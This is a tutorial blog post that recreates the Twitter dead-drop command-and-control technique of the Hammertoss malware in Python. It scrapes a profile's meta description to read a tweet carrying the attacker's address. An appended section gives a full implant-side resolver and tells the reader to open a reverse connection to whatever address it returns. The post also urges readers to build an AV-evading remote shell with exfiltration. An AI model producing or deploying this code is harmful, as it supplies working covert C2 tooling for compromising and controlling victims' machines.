How Did the Russians Abuse Twitter as C&C in Hammertoss Malware? Python Answers 2023
In this article we will learn how the Russians abused Twitter as a C&C channel in the Hammertoss malware, and we will recreate the first stage of that technique in Python.
How Did the Russians Abuse Twitter as C&C in Hammertoss Malware?
Today we're going to recap a technique used by a recent, sophisticated and hard-to-trace piece of Russian malware called Hammertoss, whose creators abused well-known sites like Twitter and GitHub to slip past modern firewalls and frustrate anyone trying to follow their tracks.
In short, instead of opening a direct connection back to the C&C server the way traditional malware does, this clever malware hops between third-party services to do its malicious work. Please take two minutes to watch the short explainer video in FireEye's write-up (https://www.fireeye.com/blog/threat-research/2015/07/hammertoss_stealthy.html) so you get a quick overview of how the malware works.
Okay, so the first stage of Hammertoss was to connect to Twitter and look for a tweet containing the URL of an image and a hashtag; the hashtag tells the malware where in the image the hidden data starts and supplies part of the encryption key. Technically, you don't need to be logged in to Twitter to read someone's tweet, so in this case we just need to find the URL of the handler account and the HTML tags that wrap the actual tweet. Keep in mind that additional Twitter accounts can be used to hide the original one (the one that belongs to the attacker).
Obviously, you should never use your personal account when doing things like this, so I created a new account under my name; here is the link to its Twitter home page: https://twitter.com/HussamKhrais
Now I tweeted from my Kali machine saying "Hello from Kali python" and then logged out. At this point, if we open the URL above, we should see something similar to the output below.

Now, using your browser, you can view the HTML source of this page (in Chrome, right-click anywhere on the page and select "View page source", or press Ctrl+U for short). If we search the HTML for our tweet, we find the line below:
<meta name="description" content="The latest Tweets from Hussam Khrais (@HussamKhrais): "Hello from kali python"">

So technically, if we write a simple script that goes to https://twitter.com/HussamKhrais, loads the HTML page, and then looks inside the HTML for a meta tag whose name attribute is description and reads its content attribute, we should be able to grab our tweet.
Let's convert this action into code:

```python
from bs4 import BeautifulSoup   # pip install beautifulsoup4
import urllib.request

# Fetch the raw HTML of the profile page
html = urllib.request.urlopen('https://twitter.com/HussamKhrais').read()
# Hand the HTML to BeautifulSoup so we can search the tag tree
soup = BeautifulSoup(html, 'html.parser')
# Find the <meta name="description"> tag and pull out its content attribute
x = soup.find('meta', {'name': 'description'})['content']
print(x)
```
- Import the BeautifulSoup class from the bs4 library; we will use it to search for HTML tags
- Import urllib, which will navigate to our Twitter page and fetch the HTML for us
- Go to my Twitter home page (HussamKhrais) and store the HTML page in the html variable
- Pass the HTML to BeautifulSoup so we can parse it
- Look for the meta tag whose name is description and read its content attribute
- Print the result
The output of running the script is shown below.

At this point, since we only care about the string between the quotes, we can filter it out with a regular expression, and that's exactly what the script below does for us:

```python
import re

# Grab every string that sits between double quotes; the first one is the tweet
matches = re.findall(r'"(.*?)"', x)
tweet = matches[0]
print(tweet)
```

- re.findall grabs every string between " and " and stores them in a list called matches. Finally, we print the exact tweet.
After assembling all the parts of the script, we get the result below.

Now think about it for a second: can we use Twitter to replace dynamic DNS? What happens if we replace "Hello from Kali Python" with the attacker's public IP? Every time the attacker's IP changes, all he has to do is post a tweet with the new address and the victim will connect back to it.
After reading this article, do you think you could code a complete AV-evading remote shell in Python and exfiltrate data without a single direct connection to your target? Please share your thoughts.
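The full "dead-drop resolver" described above (fetch the profile page, pull the tweet out of the meta description, treat it as the attacker's address), as an added example that is not the original script from this article. It uses only the Python standard library (html.parser instead of BeautifulSoup) so it runs offline against the constructed SAMPLE_HTML below; the page layout, the account name, the documentation address 203.0.113.10 and port 4444 are all assumptions. It goes one step beyond the text: because the implant will blindly connect to whatever it reads, parse_beacon() refuses anything that is not a well-formed IPv4:port, so a stray, mistyped or tampered tweet cannot send the victim somewhere arbitrary.

```python
"""Dead-drop resolver: pull an attacker address out of a public profile page.

Added example, not the article's own code. Stdlib only, so it runs offline
against the constructed SAMPLE_HTML; fetch_beacon() is the live variant.
"""
import ipaddress
import re
import urllib.request
from html.parser import HTMLParser

# Constructed sample of what the profile page looked like (an assumption).
# Inside an attribute the tweet's own quotes are entity-encoded (&quot;),
# which is what the browser's "view source" line in the article really carries.
SAMPLE_HTML = """<!DOCTYPE html>
<html><head>
<meta name="viewport" content="width=device-width">
<meta name="description" content="The latest Tweets from Hussam Khrais (@HussamKhrais): &quot;203.0.113.10:4444&quot;">
<title>Hussam Khrais (@HussamKhrais) | Twitter</title>
</head><body></body></html>"""


class MetaDescriptionParser(HTMLParser):
    """Collect the content attribute of the first <meta name="description">."""

    def __init__(self):
        super().__init__()
        self.description = None

    def handle_starttag(self, tag, attrs):
        if tag != "meta" or self.description is not None:
            return
        attrs = dict(attrs)  # html.parser has already unescaped &quot; for us
        if (attrs.get("name") or "").lower() == "description":
            self.description = attrs.get("content") or ""


def extract_description(html: str):
    """Return the meta description text, or None if the page has none."""
    parser = MetaDescriptionParser()
    parser.feed(html)
    return parser.description


def extract_tweet(description):
    """Return the first double-quoted string, i.e. the latest tweet, or None."""
    if not description:
        return None
    m = re.search(r'"(.*?)"', description)
    return m.group(1) if m else None


def parse_beacon(tweet):
    """Interpret a tweet as IPv4:port. Returns (ip, port) or None if malformed.

    The implant must not connect on anything that is not a clean address:
    a chatty or tampered tweet is rejected instead of being used as a target.
    """
    if not tweet:
        return None
    m = re.fullmatch(r"\s*(\d{1,3}(?:\.\d{1,3}){3}):(\d{1,5})\s*", tweet)
    if not m:
        return None
    try:
        ip = ipaddress.IPv4Address(m.group(1))  # rejects octets > 255
    except ipaddress.AddressValueError:
        return None
    port = int(m.group(2))
    if not 1 <= port <= 65535:
        return None
    return str(ip), port


def resolve_from_html(html: str):
    """Full pipeline: HTML -> meta description -> quoted tweet -> (ip, port)."""
    return parse_beacon(extract_tweet(extract_description(html)))


def fetch_beacon(url: str, timeout: float = 10.0):
    """Live variant: fetch a profile page and run the same pipeline on it."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resolve_from_html(resp.read().decode("utf-8", errors="replace"))


if __name__ == "__main__":
    print(resolve_from_html(SAMPLE_HTML))  # ('203.0.113.10', 4444)
```

To go live, call fetch_beacon("https://twitter.com/<handler>") from the implant and, if it returns an address, open the reverse connection to it; if it returns None, sleep and poll again later, exactly as the malware would wait for its next tweet.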